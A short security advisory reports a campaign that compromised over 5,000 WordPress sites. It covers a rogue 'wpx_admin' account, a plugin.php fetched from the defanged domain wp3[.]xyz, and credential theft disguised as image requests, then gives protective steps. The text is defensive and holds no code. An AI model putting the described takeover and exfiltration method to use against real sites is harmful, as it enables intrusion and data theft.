A new malware campaign has compromised over 5,000 WordPress websites, allowing attackers to create unauthorized admin accounts, install malicious plugins, and steal sensitive data.
The attackers are leveraging the domain wp3[.]xyz to execute their malicious activities. Once a WordPress site is compromised, a rogue admin account named wpx_admin is created, with credentials embedded in the malicious script. The malware then installs and activates a plugin (plugin.php) downloaded from the same domain. This plugin is designed to collect sensitive data, including admin credentials and logs, which it sends to the attacker’s server disguised as image requests.
The campaign is highly organized, with the malware verifying key steps, such as confirming the rogue admin account’s creation and the plugin’s successful installation. However, the initial method used by the attackers to gain access to the websites remains unclear.
How to Protect Your Website
To safeguard against this malware, c/side recommends the following steps:
- Block the Domain: Use firewalls and security tools to block the domain wp3[.]xyz, which the malware uses for its operations.
- Review Admin Accounts and Plugins: Check your WordPress site for unauthorized admin accounts and unknown plugins. Remove any suspicious activity immediately.
- Strengthen CSRF Protections: Implement robust Cross-Site Request Forgery (CSRF) defenses, such as unique token generation, server-side validation, and periodic token regeneration. Short expiration times for tokens can further enhance security.
- Enable Multi-Factor Authentication (MFA): Add an extra layer of security to admin accounts by enabling MFA, which can prevent unauthorized access even if credentials are stolen.
Website administrators are urged to act quickly to prevent further compromises and minimize the impact of this malware campaign.
